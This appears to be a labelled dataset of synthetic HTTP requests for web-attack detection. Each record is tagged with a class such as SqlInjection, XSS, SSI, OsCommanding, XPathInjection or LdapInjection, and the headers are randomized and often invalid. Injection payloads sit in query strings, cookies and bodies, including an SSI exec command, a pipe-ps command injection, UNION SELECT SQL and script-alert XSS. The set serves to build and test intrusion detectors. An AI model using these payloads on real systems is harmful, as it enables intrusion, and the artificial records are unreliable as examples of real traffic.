GET /n8iiltNUA5ert6sp/indAo8rblotp6egelp/actazrah/huafg/j4catT15uG4TmconnectBZ/rpj/eGrpcLc0A2g4Y/rciEosaldeaelpb9/hszzW.gif?pi=7431&mXbopONevbscriptdO=8icdrsqFN&tevafthlr=66574&6pntess=s2&cWC=m%3A%5Cautoexec.bat&Dl=4356121&nAasYOuEx=Otyon&ALmupdatedQWprocessing-instruction=o&di=lb%5Des+Eiq&moj9w=158&siy3edwao=me6&wxhe2=cC-n9m HTTP/1.0
Host: www.nrss.com
Connection: close
Accept: audio/*;q=0.3
Accept-Charset: big5, windows-1250, euc-tw;q=0.1, x-mac-turkish;q=0.4
Accept-Encoding: compress;q=0.0, compress;q=0.7
Accept-Language: Eei-3;q=0.3, sbK-eiefiEh;q=0.1
Cache-Control: meue='Darose7n'
Client-ip: 40.147.120.92
Cookie: ssxatt=eNY4mlm
Cookie2: $Version="08"
Date: Wed, 06 Feb 08 16:01:37 UTC
ETag: "9GnhRAmRvCoiz6Yum"
Expect: 100-continue
From: tehZutuc@dllzd.uk
If-Modified-Since: Wed, 19 Jul 06 24:34:04 GMT
If-Unmodified-Since: Thu, 22 Apr 04 15:12:32 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Oct 04 04:01:46 GMT
Max-Forwards: 41
MIME-Version: 2.9
Pragma: neoupi=i0
Proxy-Authorization: Basic dXlpYnc6ZW5OZWU0cw==
Authorization: Basic Z3BMb2ljOjZ0ZWdNaw==
Range: 151606-
Referer: http://aoew.de/woi0t/tnoe/Thrxh/1ocil.cfm
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/7.3 (compatible; MSIE 3.9; Linux i386; ereeEDe; lAeacys9Ti; etu1n)
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 9422x259
Via: 5.1 www.inmilnhc.jpeg
Transfer-Encoding: compress
Upgrade: F3awa4/4.3, 9rim7/0.4, reilie/2.8, 3il/4.5, Stse/6.1
Warning: 610 192.1.135.3:2396 "ysstaeiltotrenks" "Sun, 26 Mar 06 18:59:14 UTC"
X-Forwarded-For: 110.58.93.193
X-Serial-Number: 06918680418533
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45794
Start - Id: 43580
class: OsCommanding
GET /njAyGcP6Mtelnetj3W/F5Scpscript/alsost9recj/7R1hPLwhtpass3.4o.js?rddf1i=e3eta%7C+P1&ehiuelReEqra=%7Cps++++-auxwww+++++%3B&tuuslRecwhbmaap=gralea-&2btre0mto2a2Oot=058&26connectHNmJshutdown=2Me_7&erwjaumlEtnhjp=dlc4&iorLtu=h%3E&0Iob=38&auiese=documentt+execfrnusTilhservicesimgict HTTP/1.1
Host: 229.111.123.226
Connection: 0reSo
Accept: audio/basic, video/mpeg, application/*;q=0.5
Accept-Charset: windows-1251;q=0.7, windows-1250, windows-874;q=0.1, iso-2022-jp;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: oi-obia4qoe, orrrOrmf-hcateeaa, dte-apLM, neoltwir-ttfi
Cache-Control: no-cache
Client-ip: 43.226.69.253
Cookie: eskomttweuhI=uC4BsjW;pezuretB0=rAs httpshg6  PslrbQ%
Cookie2: $Version="882"
Date: Wed, 12 Mar 08 07:02:07 GMT
ETag: "z@VDwv-LBAonIc6"
Expect: oCdgAeg=huco
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Tue, 23 Dec 08 18:03:06 CET
If-Unmodified-Since: Mon, 08 Mar 10 14:16:51 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 08 Aug 08 16:16:11 GMT
Max-Forwards: 995
MIME-Version: 0.2
Pragma: gn5dym=wVmenor
Proxy-Authorization: Basic Mm9zZXNlbzphc3dkaGVq
Authorization: Basic aWdrbzplYmhwNnQ=
Range: 08647-744
Referer: /agoogTx/aghatddu/amen/edl2hrho/bu4nnaec.pdf
TE: trailers
Trailer: Host
User-Agent: uWw7v86 http://www.eearasey.ch
UA-CPU: PowerPC
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 881x134
Via: 6.0 www.toctee.tiff
Transfer-Encoding: compress
X-Forwarded-For: 171.91.103.182
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43580
Start - Id: 40351
class: SSI
PUT /E2.mspx? HTTP/1.0
Content-Length: 161
Content-Language: HIa
Content-Encoding: compress
Content-Location: /or4je/eirptel/ielo6shv.jsp
Content-MD5: bE5zYWx5alJpc3RsbXZNYg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 01 May 06 24:20:35 CET
Host: www.4agi.be
Connection: rG3ndCAt
Accept: audio/*;q=0.5
Accept-Charset: x-mac-ce;q=0.6, x-mac-cyrillic;q=0.8, euc-cn;q=0.1, x-mac-roman, iso-2022-jp;q=0.3
Accept-Encoding: identity;q=0.4, identity, deflate;q=0.0, gzip;q=0.0
Accept-Language: oa-epzdhc;q=0.2, tb-uha, 7tasfo-tStIt, neiaks-erhiue, bn0ra-s
Cache-Control: Hp6=Ty
Cookie: wttsh=<!--  #exec     cmd="c:\progra~1\tostn1c\ee\ogce.exe   d:\zwa\www.getrna.org\t0o\database.mdb /x exporttofoxpro"-->;I@ep= xba;ljtedtoeekgX3=ttTi7
Date: Sat, 30 Oct 04 21:41:50 GMT
Expect: teHsqr=sEmwr;here
If-None-Match: "BYDVH2nY8epNV4d0wSt"
If-Range: Mon, 19 Jan 04 07:10:17 GMT
Max-Forwards: 880
MIME-Version: 2.6
Proxy-Authorization: 6rhn 2AdTdl3=nlayte
Referer: http://www.esArwe.cz/saeraTm/zijseq5/onnnea/heQks/Xdaooemp.nsf
TE: trailers,trailers
User-Agent: Mozilla/9.1 (compatible; Konqueror/0.0; Linux i586; Rt7n9eh; fArmr)
UA-CPU: StrongARM
UA-Pixels: 1155x978
Transfer-Encoding: compress

tnivpoa2cAni=6708&erec8oan4s=lsmnzi8Owsn&cpmte=63318803&m3alhs=nbja &aiAcyene=nl&mUlxl8u=2ggX&sbssetmllt=e10dnie&odEteoudmr=ern&iaoedeSC=e-;xmlhlam&nT5ilu=o~

End - Id: 40351
Start - Id: 35576
class: XPathInjection
GET /Eahtpfh/bQtduCtioloestl/mDEB5QA/tU/1@HEDDufPkX.nsf?ut5ag=8ig7oadtgsygroup+byoVeo&sssr6exwea3akie=evRtabei1iaeioux&LaePZ2Nhomez33=070790&serlostd=st_2Gj&1t=tot%2Fatr%2Fia9l%2Fchild%3A%3Anode%28%29%5B+++++position%28%29%3D323%5D+++%7C+5b%2FIt0eR%2F0d%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D80%5D+++++or+++++%27eguungs%27++++%3D+%27 HTTP/1.0
Host: 225.65.223.97:80
Connection: close
Accept: video/quicktime
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: 6e6rp-eystTe;q=0.7
Cache-Control: no-store
Client-ip: 252.234.242.120
Date: Tue, 09 Aug 05 18:58:12 UTC
ETag: W/"hI@P2lhb.9ij7_jV"
Expect: 100-continue
If-Modified-Since: Mon, 23 May 05 22:45:58 GMT
If-Unmodified-Since: Thu, 02 Oct 08 05:55:40 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 01 Jun 04 09:16:46 GMT
Max-Forwards: 245
MIME-Version: 1.5
Pragma: no-cache
Authorization: Basic dXk2aHBudTpveTV4aXJ1eQ==
Referer: /gDria/n8hq/nemizt/h7neu/m4rEe.mpg
User-Agent: ioT4Y4jY6 http://www.nLrr.ch
Via: FTP/5.3 223.25.50.27, HTTP/7.6 www.rludt.html
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 36638700307195
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35576
Start - Id: 47150
class: XSS
GET /5prasrH4/lnzDeG87/ie8/3H.kCAkUxsxOJx/0e/oHFMxSzQ1U@81PCm1zm/oerbFezmrinrahe/cmdP/nzwGQTp7opt/iaa8anaf2ercmtQdt/5WW-lnZt.aspx?2xRoinsertm@=gH-i&natm4mshhn0xm=am2+&tN1=%3Cscript++%3Ealert+%28%27xnF.vI3s%27%29%3C%2Fscript%3E&nfiieaiNxehelS=07083&oleDhtnuu3sws=+raccess_log2e&aepbitrpahn=eVtI&n40KvP8likezh0E=Ke&Waoot=+iemE&TMcQ2vmqlocationoRA=%7Coolnckes&aRaeunnuffon=Yeiaiboot.inieie%3Fhttps&mgleroyn=liRhd HTTP/1.1
Host: 57.246.157.189
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Oyo-8h;q=0.3, cUaaoryx-tdc, itEa-fr, a-et
Cache-Control: min-fresh=219
Client-ip: 181.228.8.193
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="5"
Date: Sat, 23 Feb 08 13:11:15 CET
ETag: W/"0zXn4F-uIX@DtGV_"
Expect: tnrpsa=tPsspxH
From: Sdaen@9h0ezmcr.org
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Sun, 17 Jul 05 06:23:52 UTC
If-Match: *
If-None-Match: "Bk@IKxqGEnEQMGu.e"
If-Range: Fri, 23 May 08 02:14:43 UTC
Max-Forwards: 2
MIME-Version: 6.6
Pragma: tsa='Eirt'
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: NTLM b0EydXZ0YWVpbjlpNFQwYXcyZUllZWNudWFtbmxtcm91d2l2bW5UcmVzbGVybWVz
Range: -016,1-,67332-47295
Referer: http://ivi5te.gov/hoeso/ueuotfsa/d2i1e.php3
TE: trailers
Trailer: Date
User-Agent: eda2mu (uesNZra; aNw2dM7Q.; oyTxxauC; sDJ@kxh3)
UA-CPU: 68000
UA-Disp: 2636,076,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: 4.8 140.128.117.70
Transfer-Encoding: deflate
Upgrade: see/0.0, ujnd/2.6, afee/4.4
Warning: 133 www.sgmoeN.htm "nctpp" 
X-Forwarded-For: 77.180.133.237
X-Serial-Number: 54001451967
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 47150
Start - Id: 39305
class: SSI
GET /skua5qPJs7Vbr2T/ivKZ3VOq7d/c-B02yrbwTi0/srjehsi3/ad-8TQVj3/sleyrpb/efs-I04YBjtT/y1ryNC.gif?4eQZR-Sp=158&wp-T5z=kF%3Aprocessing-instructiontz&e9xnsa09et=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&ptcstS0Oq6b=865&GN=7s%24%3Dnetcat%24Lmar0eee&boot.inizlocationd=plI9&ud79chz=71011 HTTP/1.0
Host: www.mo0r.biz
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-8859-7, iso-10646-ucs-2;q=0.6
Accept-Encoding: gzip;q=0.2, gzip;q=0.6, identity, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 153.58.125.227
Cookie: aEeo2Elermw=3538;obka4=iBmjYaaHluA8;fbgsoundMK_KU5V0Z=jceteoopasswd0Isen;nmtlnccAaeiA=wc6UtI;ssc9hcegud4HNae=3z aylfewget seEt~ v';e9qr1sd=o@io>hbb
Cookie2: $Version="461"
Date: Sun, 04 Sep 05 12:57:55 UTC
ETag: W/"t6VPSZigbyYadImOF6e"
Expect: ivretIHm=oecetoss;otnpul=u4O88p
From: Tsaa@kodl.uk
If-Modified-Since: Thu, 31 Jan 08 11:47:45 GMT
If-Unmodified-Since: Tue, 23 Jun 09 10:13:20 GMT
If-Match: *
If-None-Match: *
If-Range: "7DYUllIPglxX0x09"
Max-Forwards: 4
MIME-Version: 8.9
Pragma: trstii8=ftpothnq
Proxy-Authorization: Basic bDN0bGhzOmVldEdkZXI=
Authorization: NTLM a25pdG82dG13dWlmbGREOGhpYjd0MWFhZERvcnRta2Ftb29ubmh4
Range: 9225-57239,301-8
Referer: /nthxgtt/eahLibnl/1ntuSsTt/eyre/eixyS.nsf
TE: trailers,deflate;q=0.6
Trailer: Accept-Charset
User-Agent: 1teGNTorEAonbham
UA-CPU: MIPS
UA-Disp: 646,7509,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 5234x268
Via: unmc/1.0 59.169.11.105, 4.0 235.210.94.78
Transfer-Encoding: ks2h1; sdgoons=srt4ty
Upgrade: asiM/9.3
Warning: 228 www.sonottir.jpg "rhCetiasi8AntEe7B" "Tue, 08 May 07 07:56:15 GMT"
X-Forwarded-For: 229.251.127.187
X-Serial-Number: 559061405127813998
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39305
Start - Id: 42077
class: SqlInjection
GET /wpo33loodaem8afawava/e49sttayeatmm1i399n/mdtta5et0/iaedeietpairetdha/4NuauV@PapgOz/hYuhPhn-MsinnR/gs/j5K/itje4nc8eantee/fTQsCziYdp7AFXB/hpe/x3NM2VvPAjH.bin?a6dropmetaZGBGW6r=43&pecoocm3frm5t=select++RVcho5i+++from++ALL_USERS&loEnetanlnan=oRw.&trpin6ab0stxRn=5 HTTP/1.0
Host: www.ozeupetnfs.com:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 79.156.167.12
Cookie: r0ssdklo=e window.openboot.inigroup by;eotd2rekltbc==a
Cookie2: $Version="36"
Date: Sat, 29 May 04 17:13:51 GMT
ETag: "SQ-tIM.HVaLNvisl3sL"
Expect: 100-continue
From: gan8eOt@rhvog.uk
If-Modified-Since: Sat, 31 Mar 07 20:51:50 GMT
If-Unmodified-Since: Tue, 02 Oct 07 22:49:22 UTC
If-Match: *
If-None-Match: "09z3NyWNnJAYmcIw"
If-Range: "TJsrsfNJCZnFacpCa"
Max-Forwards: 4
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic ZXRhb2llOm9ZN2lJ
Authorization: Basic cnJpbDplcHJ0aGU=
Range: 54-40255,-926,-098
Referer: /ttiin/8yhr0ta/en5er/eaeXdhys.gif
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.9 (compatible; shsapesU; Win98; srolv; GoanBrne)
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4241x2926
Via: HTTP/8.0 179.46.94.57
Transfer-Encoding: compress
Upgrade: ony/5.5
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42077
Start - Id: 42505
class: SqlInjection
GET /4w_e88YR/2usTuPm10t/N6c1evraergwse4s/raohtop.php?iSoE3zdRt=%27+%29+UNION+++ALL++SELECT++++218%2C7%2C328%2C178%2C154+++++FROM++Yrjlrs7a+WHERE+++++%28+++%27%27++%3D+%27&dmGiutTc3=+winntlm5&9f9vIDTaz=e+gi%24jinsertLed+S&Recqagme1yit=tMpf&otGygbeAa=tfbluni&_FS6BaQ@WQoo=gdeus9iformr+E HTTP/1.1
Host: 145.175.177.201
Connection: keep-alive
Accept: application/zip, text/html;q=0.2
Accept-Charset: iso-8859-8, iso-8859-1, windows-1252
Accept-Encoding: 
Accept-Language: fso9de-gceu;q=0.5
Cache-Control: only-if-cached
Client-ip: 59.62.46.157
Cookie: drr=tsde;io=2fe o;wFC0httpse3= tgi6pipr;XexecU_=alnhtndttOECnias;KopassthruUpassthruk@c0=au;szelraoTrry4=667
Cookie2: $Version="85"
Date: Mon, 14 Aug 06 23:54:06 UTC
ETag: W/"Meb@PuEcS0MSg5w"
Expect: eb8e
From: be38Ged@6e9snto.ch
If-Modified-Since: Wed, 22 Dec 04 20:34:49 CET
If-Unmodified-Since: Mon, 24 Mar 08 23:46:09 CET
If-Match: "L2Vij3R8ukgc0zgU"
If-None-Match: *
If-Range: Tue, 02 Sep 08 14:23:54 GMT
Max-Forwards: 748
MIME-Version: 8.8
Pragma: 0=Yenjnc
Proxy-Authorization: Basic d2xpbjplbmsxaHk2bQ==
Authorization: Digest uri=http://noqluar.com/ntodeig/dth6.jpg
Range: 16802-
Referer: http://www.ngl9c.ch/1deu/yt3d/nsi4lJTi/ieeo.wav
TE: gzip;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.3 (X11; U; Solaris 5.9; oH-Ie; rv:4.0.5) Gecko/57252223
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 733x829
Via: HTTP/5.1 192.144.64.250, HTTP/3.9 www.oxoc3tW.js
Transfer-Encoding: gzip
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 504 127.15.72.187:71097 "tehsu6o03" "Sat, 20 Aug 05 24:15:38 GMT"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 171208894897748
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42505
Start - Id: 48176
class: XSS
POST /y9hny8ceer1cted/iR/TkfOJU0k_/tpeEO/uzieUgaye/location2h8sMtiC3Jh/bng9patr.html? HTTP/1.0
Content-Length: 249
Content-Language: p0afoia,tni,8
Content-Encoding: deflate
Content-Location: /oshc4n.nsf
Content-MD5: b2FlZW94bmRobG9zcmVlbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Nov 06 16:51:52 GMT
Last-Modified: Fri, 31 Oct 08 18:09:05 GMT
Host: www.belxu.uk:4763
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: <link     rel    = "  stylesheet     " href   =    "    javascript: [alert   ('symya');]"    >
Cache-Control: no-cache
Client-ip: 148.144.232.153
Cookie: ntpx44=o w$ip&tnib9qF;1vFdeleteyZ=hnsgs;Fahey9ntC5hhlo=0664062;tRaaixfiseft=wliboulzmboot.inisWeTlSea2wm;or20hearaosso=sxrtsobxtis0ie8s
Cookie2: $Version="4"
Date: Mon, 02 Feb 09 18:10:26 CET
ETag: W/"fWjHf.8xJdj4mZc-UDXZ"
Expect: 100-continue
If-Modified-Since: Fri, 27 Apr 07 11:06:59 GMT
If-Unmodified-Since: Mon, 23 Aug 04 24:40:09 UTC
If-Match: "aw2lIMZhbKvM4TpuIS6"
If-None-Match: *
If-Range: Thu, 04 Oct 07 01:12:33 GMT
Max-Forwards: 6
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest username="Nbcsty"
Authorization: Digest nc=11B11BAE
Range: 252-,4-47,9983-
Referer: http://www.aOa9eHra.biz/rTsn.sh
TE: deflate,trailers,chunked;q=0.6
Trailer: Range
User-Agent: Mozilla/2.2 (compatible; MSIE 5.5; Win 9x; kh3hqadm)
UA-Disp: 7787,6372,16
UA-Color: color8
Via: HTTP/4.8 76.153.226.42:276
Transfer-Encoding: gzip
Upgrade: eMe/4.0, mna/3.4
X-Forwarded-For: 203.248.86.3
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

brI0inEea=knuhCcdbleNdeorau&hisetur1sdUfi=501192&mailHF9heval8yFo.m=50&0kb=0&ebSldne=o)-&zitmrt=lB&z3TVbu5=>h]&ge=is&fses6ytic=6&thrrpda=iieaxnleoA la&iieaav=716&GPx2IBIYR-=isystem stEcexecsl~nfe&xtermwP2=udivAl rreDb@r\ensr&athleo=i/i

End - Id: 48176
Start - Id: 40869
class: SSI
GET /bztaa/eAFzb/9r3mordzoanMbnO/tC-@qOhUuORv/iOuhzean0s1ew/bBrootw/niodbikhhlia6oezR/jt0r2AhGY7/E0qmheo.cgi?emauszrdsLfo=t&Ei=%3C%21--++%23odbc++++statement%3D+++%22select++++or%2C+oyj%2C+++mutc+from+++++3nhu4ae0aa++++order++by++++4%2C++++23%2C++8%22+++--%3E&hgmdedecbh=ethelaiSOsetwvs HTTP/1.0
Host: 106.238.15.196
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.8
Accept-Language: *
Cache-Control: max-age=8
Client-ip: 252.64.231.123
Cookie: Pf9vHTand=atttb;tZaloNnok0=37175236;a0E1liah1t=rIHH;hbChaRrgDdheesi=oKr9OFN;SwinntkW2lXg=0317739
Cookie2: $Version="8"
Date: Thu, 22 May 08 01:20:17 UTC
ETag: "sKr@_Vwhn_E5hW1u"
Expect: 100-continue
From: xhslhnd@1eneubz.it
If-Modified-Since: Thu, 08 Apr 04 17:47:58 GMT
If-Unmodified-Since: Wed, 28 Nov 07 11:07:44 CET
If-Match: *
If-None-Match: "U8A2Imsd7wd2@Ey"
If-Range: "LVPH1NkG@4g7F9t5qiG-"
Max-Forwards: 310
MIME-Version: 8.5
Pragma: dDRezfn='Ogd'
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: NTLM c2Fvd3JwZGZjc2J4SXNzZGF4MWhyM2J0blR0cGRpOWV6eA==
Range: -375,-4
Referer: /btyft/hanga/iGArwras.wmn
TE: deflate,trailers
Trailer: Upgrade
User-Agent: Mozilla/3.5 (Windows; U; Win98 5.4; tj-dn; rv:6.4.4) Gecko/62472470
UA-CPU: x86
UA-Disp: 998,969,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: HTTP/6.8 www.vietfyP.html, HTTP/1.6 www.Itn1role.png
Transfer-Encoding: gzip
Upgrade: saht/3.7, 9sha/5.8, Eossd/8.6, rms/3.5
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40869
Start - Id: 37665
class: LdapInjection
PUT /skWaMoeJ/ddn/m9-S.xQfEGox.htm? HTTP/1.0
Content-Length: 152
Content-Language: liopneic,h0bT9
Content-Encoding: gzip
Content-Location: http://www.nostdt.net/agsi/imbn/yhhtl/earnetaD.asmx
Content-MD5: bXNhcTRvdXVqZHJvb2hyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Mar 04 06:33:46 GMT
Last-Modified: Tue, 15 Feb 05 14:24:37 GMT
Host: www.nml9bn.uk
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-hebrew;q=0.2, utf-7, x-mac-roman;q=0.4, x-mac-korean, iso-8859-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 88.224.210.21
Cookie: lF3cget=7190;9g1GcDQLR=ae;pyaqilhrte8ln=2128070;dlbee=is9teqiCsn=o-samprh;y5eito=bo4aSqs1;iphl8eilrs=7972
Cookie2: $Version="657"
Date: Sun, 06 Jan 08 24:20:13 CET
ETag: "L1wKH0qc0h5OgNanY"
Expect: raso5lm
From: TttDoe@rczep.it
If-Modified-Since: Fri, 12 Sep 08 16:38:18 GMT
If-Unmodified-Since: Tue, 06 Apr 04 07:27:56 GMT
If-Match: "5qVSlFtCPr@W6bgJit"
If-None-Match: *
If-Range: Sun, 24 Jan 10 07:58:54 CET
Max-Forwards: 7858
MIME-Version: 2.7
Pragma: sClnnre=9
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: Basic Y3VzZmhFYTpTaGhF
Range: 7-75,773-,28-851
Referer: http://ehIce.gov/emdnw.rar
TE: deflate,trailers
Trailer: Authorization
User-Agent: gEcthoNdaizremb7vb
UA-CPU: StrongARM
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 940x1719
Via: 2.1 2.34.100.72, HTTP/1.0 206.92.198.88, HTTP/0.9 22.236.122.79
Transfer-Encoding: compress
Upgrade: pemoEi/4.0
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 62.169.63.215
X-Serial-Number: 0737126851
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

chixi=a8dt)(   |   (Bs=*)&t0e2tyrtw3Tp=yqMgdhbw@lv&2puyha=arm&szuonfhtioerhen=8&oroeosedianihse=jiwii&iag=d&hChejat7tut=cirgicnuetch sl eI

End - Id: 37665
Start - Id: 49680
class: XPathInjection
GET /8z6jNCvdocumentWYdQ/2AK/qwlieel/e6Z/onhX_na/sestmieSTrx/aIa2i/1CVdjy/sealiWxIpctsLeas/eWitBAaYpi6AkI6w/xJsc9/umtXTTABoT7Nh.dll?eer=22424745&wftatis=se3t&begmhq7H=0464&nli=t7lhe%27+++++or+++++c%2Fsshf%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D8%5D++++or+++%27fe%27+++%3D+%27&my1snpoanu=004&httpsGrhEm9S.4=8498 HTTP/1.0
Host: www.iahticwwe.gov:43794
Connection: close
Accept: */*;q=0.7
Accept-Charset: koi8-r
Accept-Encoding: 
Accept-Language: Y-yisk;q=0.7, 1t-s;q=0.5, yeoete-ewyetnnn;q=0.8, cd-Dry;q=0.4
Cache-Control: max-stale
Client-ip: 143.153.106.190
Cookie: Kaccess_logXrGch=anvahodb7cnme;rr=24500319;efnaesHoc=9685;thag=u;
Cookie2: $Version="495"
Date: Wed, 01 Mar 06 17:02:22 GMT
ETag: W/"T-VtSnkF-ZadA0w02nc"
Expect: 100-continue
From: ohsiewp@laEeuatptq.st
If-Modified-Since: Wed, 14 Apr 04 20:17:42 UTC
If-Unmodified-Since: Sun, 24 Jun 07 16:33:29 CET
If-Match: "KSDSf1BxOwm.3cZm"
If-None-Match: *
If-Range: *
Max-Forwards: 70
MIME-Version: 5.9
Pragma: 5l0mcv='1Qzs8ic'
Proxy-Authorization: NTLM b2RuZWV0bGVubm5nb2huU3diYWZibW9uc3BlRHp2dG1jYXdiZWNsM0FlNXM=
Authorization: sdle meWstur=sniaulb
Range: -09
Referer: http://4r0Td.uk/5heawin/nftmkrE/hnsRs.tar
TE: trailers,chunked,trailers
Trailer: Range
User-Agent: Mozilla/6.8 (Machintosh; U; PPC Mac OS X 4.4; aa-di; rv:9.9.6) Gecko/83093238
UA-CPU: Sparc
UA-Disp: 8272,159,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 491x233
Via: 2.3 177.238.27.126, 6.3 249.88.104.16, HTTP/8.3 184.130.11.61
Transfer-Encoding: deflate
Upgrade: reeei/0.0, w2wde/2.4, e58a/5.6
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49680
Start - Id: 50086
class: XPathInjection
POST /Yc8b-/p5Cnanas/vstnlhc/KWO/aaIV_Tn9XYUnFn/7o2eedsb1xesv1bnfu/nhdcIttsf0sdrses5l/cemFZcmd/wCqTM9yIGJ9bg/y6o9NchzvoTie/Tidoodojp3eh5.nsf? HTTP/1.0
Content-Length: 107
Content-Language: eTnh5rd
Content-Encoding: compress
Content-Location: /7roh/rmqsosut.msf
Content-MD5: Ym1zdm9yZXNoZWlhYWhwdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Mar 06 22:54:58 UTC
Last-Modified: Thu, 17 Jan 08 14:12:21 CET
Host: 53.139.216.204
Connection: keep-alive
Accept: text/xml, text/xml;q=0.7
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.3, deflate, gzip, deflate;q=0.1
Accept-Language: tme2t-aa, 9rhdl-Elea01i, 2aetrwo-at;q=0.2, dVgtu-rsnx;q=0.7, 3ejuw-nt4o5tet
Cache-Control: no-transform
Client-ip: 105.22.212.218
Cookie: hteCeppmYaa6=1049838;ugs=rVc/nqo6r/yrd/child::node()[position()=169]    or     'mrmlait'  =  ';ee1gacd=4;gaAseoenadt=cvarsoraciEhe;wxhld=ipOnrh
Cookie2: $Version="0"
Date: Fri, 18 Jun 04 23:06:23 UTC
ETag: "sE0Gym508QYRsKc"
Expect: tsaihsay
If-Modified-Since: Thu, 20 Jul 06 12:31:40 CET
If-Unmodified-Since: Sat, 18 Nov 06 19:54:46 GMT
If-Match: "2ANPKkNcx_IoU-HqaoTY"
If-None-Match: *
If-Range: *
Max-Forwards: 205
MIME-Version: 7.4
Pragma: dolt=retSedoe
Proxy-Authorization: Digest cnonce="es2eOa"
Authorization: NTLM N0loa2lpeHRudGVGY241TnJyYWVhc2luZGhrNG9nbWRhbDBoODlyb3Ni
Referer: http://www.mnnt1lU8.st/lsdmzaoy/eenei7/eleidn.pdf
TE: trailers,deflate,trailers
Trailer: Authorization
User-Agent: Mozilla/7.0 (Windows; U; WinNT 3.4; t8-og; rv:7.5.0) Gecko/87863635
UA-CPU: x86
UA-OS: Win98
UA-Color: color8
UA-Pixels: 4253x311
Via: 2.7 110.101.13.1:82998, HTTP/6.3 196.81.105.29, 3.0 67.72.54.36:3
Transfer-Encoding: identity
Warning: 653 103.93.101.105:17 "aetlgatnhrco" 
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

